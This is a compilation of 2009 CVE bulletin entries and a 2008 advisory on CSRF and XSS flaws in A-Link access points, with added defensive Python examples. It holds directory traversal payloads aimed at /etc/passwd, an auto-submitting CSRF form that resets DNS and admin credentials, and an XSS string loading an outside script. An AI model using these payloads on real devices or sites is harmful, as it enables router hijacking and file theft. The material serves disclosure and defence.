Unclassified NewsBoard (UNB)
CVE-2009-1948 | Source & Patch Info: XF, XF, BID, MILW0RM, SECUNIA
Multiple directory traversal vulnerabilities in forum.php in Unclassified NewsBoard (UNB) 1.6.4, when register_globals is enabled and magic_quotes_gpc is disabled, allow remote attackers to (1) read arbitrary recently modified files via a .. (dot dot) in the GLOBALS[filename] parameter or (2) include and execute arbitrary local files via a .. (dot dot) in the GLOBALS[UTE][__tplCollection][a][file] parameter.

vicftps -- vicftps
CVE-2008-6829 | Source & Patch Info: VUPEN, MILW0RM
VicFTPS 5.0 allows remote attackers to cause a denial of service (crash) via a LIST command that starts with a "/\/" (forward slash, backward slash, forward slash). NOTE: this might be the same issue as CVE-2008-2031.

vmware -- ace; vmware -- esx; vmware -- esxi; vmware -- fusion; vmware -- player; vmware -- server; vmware -- workstation
Unspecified vulnerability in the VMware Descheduled Time Accounting driver in VMware Workstation 6.5.1 and earlier, VMware Player 2.5.1 and earlier, VMware ACE 2.5.1 and earlier, VMware Server 1.x before 1.0.9 build 156507 and 2.x before 2.0.1 build 156745, VMware Fusion 2.x before 2.0.build 147997, VMware ESXi 3.5, and VMware ESX 3.0.2, 3.0.3, and 3.5, when the Descheduled Time Accounting Service is not running, allows guest OS users on Windows to cause a denial of service via unknown vectors.

webSPELL
Directory traversal vulnerability in src/func/language.php in webSPELL 4.2.0e and earlier allows remote attackers to include and execute arbitrary local .php files via a .. (dot dot) in a language cookie. NOTE: this can be leveraged for SQL injection by including awards.php.

Xfig (Debian GNU/Linux)
Xfig in Debian GNU/Linux, possibly 3.2.5, allows local users to read and write arbitrary files via a symlink attack on the (1) xfig-eps[PID], (2) xfig-pic[PID].pix, (3) xfig-pic[PID].err, (4) xfig-pcx[PID].pix, (5) xfig-xfigrc[PID], (6) xfig[PID], (7) xfig-print[PID], (8) xfig-export[PID].err, (9) xfig-batch[PID], (10) xfig-exp[PID], or (11) xfig-spell.[PID] temporary files, where [PID] is a process ID.
CVE-20091805 CONFIRM
webspell -- webspell
CVE-20091912 CONFIRM CONFIRM CONFIRM BID OSVDB
xfig -- xfig debian -- debian_linux
CVE-20091962 XF BID MLIST
Low Vulnerabilities

| Primary Vendor -- Product | Description | Published | Source & Patch Info |
|---|---|---|---|
| Apache Tomcat | Apache Tomcat 4.1.0 through 4.1.39, 5.5.0 through 5.5.27, and 6.0.0 through 6.0.18 permits web applications to replace an XML parser used for other web applications, which allows local users to read or modify the (1) web.xml, (2) context.xml, or (3) tld files of arbitrary web applications via a crafted application that is loaded earlier than the target application. | 2009-06-05 | CVE-2009-0783 CONFIRM BUGTRAQ CONFIRM CONFIRM CONFIRM CONFIRM CONFIRM CONFIRM CONFIRM CONFIRM |
| Dokeos | Multiple cross-site scripting (XSS) vulnerabilities in Dokeos 1.8.5, and possibly earlier, allow remote attackers to inject arbitrary web script or HTML via the (1) search_term parameter to main/auth/courses.php; the (2) frm_title and (3) frm_content parameters in a new personal agenda item action; the (4) title and (5) tutor_name parameters in a new course action; and the (6) student and (7) course parameters to main/mySpace/myStudents.php. NOTE: vectors 2 and 3 might only be exploitable via a separate CSRF vulnerability. | 2009-06-08 | CVE-2009-2006 VUPEN CONFIRM |
| drupal -- drupal | Multiple cross-site scripting (XSS) vulnerabilities in Drupal 5.x before 5.18 and 6.x before 6.12 allow (1) remote authenticated users to inject arbitrary web script or HTML via crafted UTF-8 byte sequences that are treated as UTF-7 by Internet Explorer 6 and 7, which are not properly handled in the "HTML exports of books" feature; and (2) allow remote authenticated users with administer taxonomy permissions to inject arbitrary web script or HTML via the help text of an arbitrary vocabulary. NOTE: vector 1 exists because of an incomplete fix for CVE-2009-1575. | 2009-06-01 | CVE-2009-1844 CONFIRM |
| drupal -- quiz | Cross-site scripting (XSS) vulnerability in the Quiz module 5.x, 6.x-2.x before 6.x-2.2, and 6.x-3.x before 6.x-3.0, a module for Drupal, allows remote authenticated users, with create quizzes or quiz questions access, to inject arbitrary web script or HTML via unspecified vectors. | | CVE-2009-1942 BID OSVDB CONFIRM CONFIRM |
| IBM DB2 | The Common Code Infrastructure component in IBM DB2 8 before FP17, 9.1 before FP7, and 9.5 before FP4, when LDAP security (aka IBMLDAPauthserver) and anonymous bind are enabled, allows remote attackers to bypass password authentication and establish a database connection via unspecified vectors. | 2009-06-03 | CVE-2009-1905 CONFIRM CONFIRM CONFIRM AIXAPAR AIXAPAR AIXAPAR CONFIRM |
| Linux kernel | The inode double locking code in fs/ocfs2/file.c in the Linux kernel 2.6.30 before 2.6.30-rc3, 2.6.27 before 2.6.27.24, 2.6.29 before 2.6.29.4, and possibly other versions down to 2.6.19 allows local users to cause a denial of service (prevention of file creation and removal) via a series of splice system calls that trigger a deadlock between the generic_file_splice_write, splice_from_pipe, and ocfs2_file_splice_write functions. | 2009-06-07 | CVE-2009-1961 MLIST MLIST CONFIRM |
| trixbox -- trixbox | Directory traversal vulnerability in user/index.php in Fonality trixbox CE 2.6.1 and earlier allows remote attackers to include and execute arbitrary files via a .. (dot dot) in the langChoice parameter. | 2009-06-05 | CVE-2008-6825 XF BID MILW0RM OSVDB FULLDISC |
Last updated June 09, 2009
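Three of the entries above (Unclassified NewsBoard, webSPELL and trixbox) are the same bug: a language selector taken from a cookie or request parameter is concatenated into a path that is then passed to include(), and ".." segments walk out of the intended directory. The following is an added example, not code from any of those three projects or from the bulletin. It shows what the concatenated path actually resolves to and a resolver that refuses it. The directory name, the allow-list regex and the payload strings are constructed for illustration; the register_globals mechanism behind the UNB entry is not modelled. One detail worth knowing about the era: because the application appends ".php" after the user's value, exploits relied on a NUL byte to cut the suffix off (which is why the UNB entry is conditioned on magic_quotes_gpc being disabled); PHP 5.3.4 later made include paths containing NUL invalid.

```python
import os
import re
from typing import Dict, Optional, Tuple

# Assumed install location of the application's language files; not a path from
# Unclassified NewsBoard, webSPELL or trixbox.
LANG_DIR = "/var/www/app/languages"
# Allow-list for what a language selector may look like: "en", "en_GB", "fin".
LANG_NAME = re.compile(r"[a-z]{2,3}(_[A-Z]{2})?")


def vulnerable_language_file(user_value: str) -> str:
    """The pattern behind the three entries: a cookie or request parameter is
    concatenated straight into the path handed to include(). os.path.join does not
    normalise, so the '..' segments survive into the path."""
    return os.path.join(LANG_DIR, user_value + ".php")


def where_it_really_points(user_value: str) -> str:
    """What the vulnerable path resolves to once the filesystem normalises it."""
    return os.path.normpath(vulnerable_language_file(user_value))


def safe_language_file(user_value: str) -> Optional[str]:
    """Two independent layers; either one alone stops the payloads below.
    Returns the resolved file path, or None meaning 'fall back to the default'."""
    # Layer 1: allow-list the shape of the value before it touches any path API.
    # fullmatch (not match with '$') so a trailing newline cannot slip through.
    if LANG_NAME.fullmatch(user_value) is None:
        return None
    base = os.path.realpath(LANG_DIR)
    candidate = os.path.realpath(os.path.join(base, user_value + ".php"))
    # Layer 2: the resolved path must still be under the language directory, so a
    # later loosening of the regex cannot silently reopen the hole.
    if os.path.commonpath([candidate, base]) != base:
        return None
    return candidate


# Constructed payloads of the shape the table describes; none is taken from an exploit.
PAYLOADS = {
    "normal": "en_GB",
    "read_file": "../../../../etc/passwd",        # UNB (1): read an arbitrary file
    "include_sibling": "../awards",               # webSPELL: include another .php
    "include_upload": "../../../../tmp/evil",     # trixbox: include a planted file
    "nul_byte": "../../../../etc/passwd\x00",     # PHP < 5.3.4 dropped the suffix here
    "trailing_newline": "en\n",
}


def evaluate() -> Dict[str, Tuple[str, Optional[str]]]:
    """Map each payload to (what the vulnerable code would include, what the safe
    resolver returns)."""
    return {name: (where_it_really_points(v), safe_language_file(v))
            for name, v in PAYLOADS.items()}
```

The allow-list is the check that matters; the realpath containment test is there so that the first layer can be relaxed later (say, to accept "zh-Hant") without anyone having to remember why it was strict.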

A-Link WL54AP3 and WL54AP2 CSRF+XSS vulnerability
Source: http://www.derkeiler.com/Mailing-Lists/securityfocus/bugtraq/2008-11/msg00010.html
From: Henri Lindberg Smilehouse Oy <henri.lindberg@xxxxxxxxxxxxxx>
Date: Fri, 31 Oct 2008 15:54:07 +0200

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

Louhi Networks Information Security Research
Security Advisory

Advisory: A-Link WL54AP3 and WL54AP2 CSRF+XSS vulnerability
Release Date: 2008/10/31
Last Modified: 2008/10/28
Authors: Jussi Vuokko, CISSP [jussi.vuokko@xxxxxxxx]
         Henri Lindberg [henri.lindberg@xxxxxxxx]
Device: A-Link WL54AP3 and WL54AP2 (any firmware)
Severity: CSRF and XSS in management interface
Risk: Moderate
Vendor Status: Vendor has released an updated version
References: http://www.louhinetworks.fi/advisory/alink_081028.txt
Overview:

Quote from http://www.a-link.com/: "WLAN Access point 54MB, 4-port Wlan Access point, wireless 54Mbps, DSSS, 802.11g standard based and it's compatible also with other manufacturers cards."

During an audit of the A-Link WLAN54AP3 it was discovered that a cross-site request forgery vulnerability exists in the management interface. An attacker can perform any administrative action in the management interface if the victim can be lured or forced to view malicious content. These administrative actions include, for example, changing the admin user's username and password, DNS settings, etc.

In addition, it was discovered that no input validation or output encoding is performed in the management interface, making it vulnerable to cross-site scripting.

By default the admin password is blank and no authentication is performed for requests to the administrative interface. As ordinary consumers usually keep out-of-the-box settings, this vulnerability offers the same kind of phishing possibilities as were used in the Banamex attacks [1]. The A-Link WLAN54AP2 (EOL) is vulnerable to this threat as well.

[1] http://www.google.fi/search?q=banamex+phishing+dns+poison
Details:

The A-Link WLAN54AP3 does not validate the origin of an HTTP request. If the attacker can make the user view malicious content, the WLAN54AP3 device can be controlled by submitting suitable forms; the attacker is effectively acting as an administrator. A successful attack requires that the attacker knows the management interface address of the target device (the default IP address is 192.168.1.254).

As the management interface has no logout functionality, the user can remain vulnerable to this attack after closing the tab containing the management interface (if the user does not close the browser window or clear cookies, and depending on browser behaviour), and is vulnerable at any time if the default blank password is in use.
Proof of Concept:

CSRF: Example form (changes DNS servers, enables WAN web server access and changes the user's username and password):

    <html>
    <body onload="document.wan.submit(); document.password.submit()">
    <form action="http://192.168.1.254/goform/formWanTcpipSetup" method="post" name="wan">
    <input type="hidden" value="dnsManual" name="dnsMode" checked>
    <input type="hidden" name="dns1" value="216.239.32.10">
    <input type="hidden" name="dns2" value="216.239.32.10">
    <input type="hidden" name="dns3" value="216.239.32.10">
    <input type="hidden" name="webWanAccess" value="ON" checked="checked">
    </form>
    <form action="http://192.168.1.254/goform/formPasswordSetup" method="post" name="password">
    <input type="hidden" name="username" value="mallory">
    <input type="hidden" name="newpass" value="gotroot">
    <input type="hidden" name="confpass" value="gotroot">
    </form>
    </body>
    </html>

XSS: Add the following content to the DDNS Domain Name field under Management in the management interface:

    ""><script src="http://l7.fi"></script><p
Workaround:
Solution:

Include a random, user-specific token in forms. More information: http://en.wikipedia.org/wiki/Cross-site_request_forgery

Perform input validation and/or output encoding. More information: http://en.wikipedia.org/wiki/Cross_site_scripting

Use a secure out-of-the-box configuration (for example, generate default passwords based on the device serial or MAC address using a secure cryptographic algorithm).

Disclosure Timeline:

13. September 2008  Contacted A-Link by email
28. October 2008    Vendor released an updated version
31. October 2008    Advisory was released
Copyright 2008 Louhi Networks Oy. All rights reserved.

-----BEGIN PGP SIGNATURE-----

iEYEAREIAAYFAkkLDf0ACgkQ3TZNEGeZkm677QCdGIBR9jySnDlKCmtN7eDMUEGM
y6sAn26m+4S2I50fuDFxBlaQTO6kqSTK
=XEbb
-----END PGP SIGNATURE-----
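The Details and Solution sections above describe the hole and the three fixes but not how a handler would apply them. What follows is an added example, not firmware from A-Link and not code from the Louhi Networks advisory: a stand-in for the /goform/ handlers that replays the advisory's own CSRF form against a session-bound token check, output-encodes the DDNS Domain Name field the XSS payload targets, and derives a per-device default password. The session model, the header names, the attacker hostname and the factory secret are assumptions made for the example; only the management address 192.168.1.254 and the form field names come from the advisory.

```python
import hashlib
import hmac
import html
import secrets
from dataclasses import dataclass, field
from typing import Dict, Optional

# The default management address from the advisory. Everything else in this file
# (session model, header names as seen by the handler, the factory secret) is an
# assumption for the example, not something the device or the advisory documents.
MANAGEMENT_ORIGIN = "http://192.168.1.254"


@dataclass
class Session:
    """One logged-in browser session. The token is random per session; a page on
    another origin can make the browser send the session cookie, but cannot read
    this value."""
    authenticated: bool = False
    csrf_token: str = field(default_factory=lambda: secrets.token_hex(16))


@dataclass
class Request:
    """The parts of an HTTP request the checks look at (constructed, not parsed)."""
    method: str
    path: str
    headers: Dict[str, str]
    form: Dict[str, str]
    session: Optional[Session]  # resolved from the session cookie, if any


def check_admin_request(req: Request) -> str:
    """Return 'ok' if a state-changing /goform/ request may run, else a reason."""
    if req.method != "POST":
        return "reject: state changes must use POST"
    # The device shipped with a blank password and no per-request authentication
    # (Overview). An admin action must first require an authenticated session.
    if req.session is None or not req.session.authenticated:
        return "reject: no authenticated session"
    # Defence in depth: a form post from another site carries that site's Origin
    # (or Referer). With neither present, fail closed.
    origin = req.headers.get("Origin") or req.headers.get("Referer", "")
    if origin != MANAGEMENT_ORIGIN and not origin.startswith(MANAGEMENT_ORIGIN + "/"):
        return "reject: cross-origin request"
    # The fix the advisory asks for: a random session-bound token in every form.
    # Constant-time comparison so the check itself is not a timing oracle.
    supplied = req.form.get("csrf_token", "").encode()
    if not hmac.compare_digest(supplied, req.session.csrf_token.encode()):
        return "reject: missing or invalid CSRF token"
    return "ok"


def render_ddns_domain(stored_value: str) -> str:
    """Output-encode the DDNS domain name when echoing it back into the page,
    which is where the advisory's XSS payload is reflected."""
    return '<input type="text" name="ddnsDomain" value="%s">' % html.escape(stored_value, quote=True)


def derive_default_password(serial: str, factory_secret: bytes, length: int = 12) -> str:
    """Third solution item. The serial or MAC alone is not a secret (the MAC is
    broadcast as the BSSID), so the derivation is keyed with a factory secret that
    must never be present in the firmware image. A random per-device password
    printed on the label needs no secret at all and is the simpler choice."""
    digest = hmac.new(factory_secret, serial.encode(), hashlib.sha256).digest()
    alphabet = "abcdefghjkmnpqrstuvwxyz23456789"  # no look-alike characters
    return "".join(alphabet[b % len(alphabet)] for b in digest[:length])


def demo() -> Dict[str, str]:
    """Replay the advisory's CSRF form against the checks with a victim who is still
    logged in (the interface has no logout, see Details)."""
    victim = Session(authenticated=True)
    wan = "/goform/formWanTcpipSetup"
    poc_form = {"dnsMode": "dnsManual", "dns1": "216.239.32.10", "dns2": "216.239.32.10",
                "dns3": "216.239.32.10", "webWanAccess": "ON"}
    cases = {
        # The PoC page hosted on the attacker's site: the browser sends its Origin.
        "poc_from_attacker_site": Request("POST", wan, {"Origin": "http://attacker.example"},
                                          poc_form, victim),
        # Same, behind a proxy that strips Origin and Referer.
        "poc_without_origin": Request("POST", wan, {}, poc_form, victim),
        # Right origin but no token: what the token check alone buys you.
        "same_origin_no_token": Request("POST", wan, {"Origin": MANAGEMENT_ORIGIN},
                                        poc_form, victim),
        # The management page itself, with the token it rendered into the form.
        "legitimate_admin": Request("POST", wan, {"Origin": MANAGEMENT_ORIGIN},
                                    {**poc_form, "csrf_token": victim.csrf_token}, victim),
        # The password form with no session at all (blank default password).
        "unauthenticated": Request("POST", "/goform/formPasswordSetup",
                                   {"Origin": MANAGEMENT_ORIGIN},
                                   {"username": "mallory", "newpass": "gotroot"}, None),
    }
    return {name: check_admin_request(r) for name, r in cases.items()}
```

Two caveats a practitioner would add. Browsers of the device's era did not send an Origin header and Referer is often stripped, so the origin check is only a second layer; the token is what closes the CSRF hole. And the two fixes depend on each other: a script injected through the unencoded DDNS field runs on the management origin and can read the token out of the page, so fixing the CSRF without the output encoding leaves the same administrative actions reachable.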